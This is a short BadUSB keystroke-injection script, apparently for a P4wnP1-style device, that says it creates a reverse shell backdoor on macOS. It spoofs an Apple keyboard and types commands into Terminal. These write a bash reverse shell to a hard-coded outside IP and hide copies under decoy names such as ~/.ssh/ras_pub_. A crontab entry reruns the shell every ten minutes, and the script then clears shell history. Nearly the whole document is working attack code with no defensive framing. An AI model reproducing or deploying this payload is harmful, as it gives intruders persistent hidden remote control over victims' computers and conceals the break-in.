# This is a ducky script to create a reverse shell backdoor

USB_VID="0x05ac"        # Vendor ID
USB_PID="0x027b"        # Product ID
USE_RNDIS=true          # If true RNDIS will be enabled
USE_HID=true            # If true HID (keyboard) will be enabled
HID_KEYBOARD_TEST=true  # Enable onKeyboardUp() function
lang="us"               # Keyboard language

function onKeyboardUp()
{

        cat <<- EOF | duckhid

                GUI SPACE
                DELAY 500
                STRING terminal
                DELAY 100
                ENTER
                DELAY 2000
                STRING echo "#\!/bin/bash" > ~/app_support.sh && echo "bash -i >& /dev/tcp/206.189.215.73/3456 0>&1" >> ~/app_support.sh && chmod a+x ~/app_support.sh
                DELAY 1500
                ENTER
                DELAY 300
                STRING cp ~/app_support.sh /tmp/; cp ~/app_support.sh ~/.ssh/ras_pub_; cp ~/app_support.sh ~/.ssh/ras_pub_; mkdir -p ~/Library/.hidden && cp ~/app_support.sh ~/Library/.hidden/; cp ~/app_support.sh ~/Library/Python3.65; cp ~/app_support.sh /usr/local/bin/Python3.65;
                DELAY 1500
                ENTER
                DELAY 300
                STRING crontab -l | { cat; echo '*/10 * * * * ~/app_support.sh || /tmp/app_support.sh || ~/.ssh/ras_pub_ || ~/Library/.hidden/app_support.sh || ~/Library/Python3.65 || /usr/local/bin/Python3.65'; } | crontab - && history -c && rm ~/.bash_history && exit
                DELAY 1500
                ENTER
                DELAY 2000
                GUI q

        EOF

}
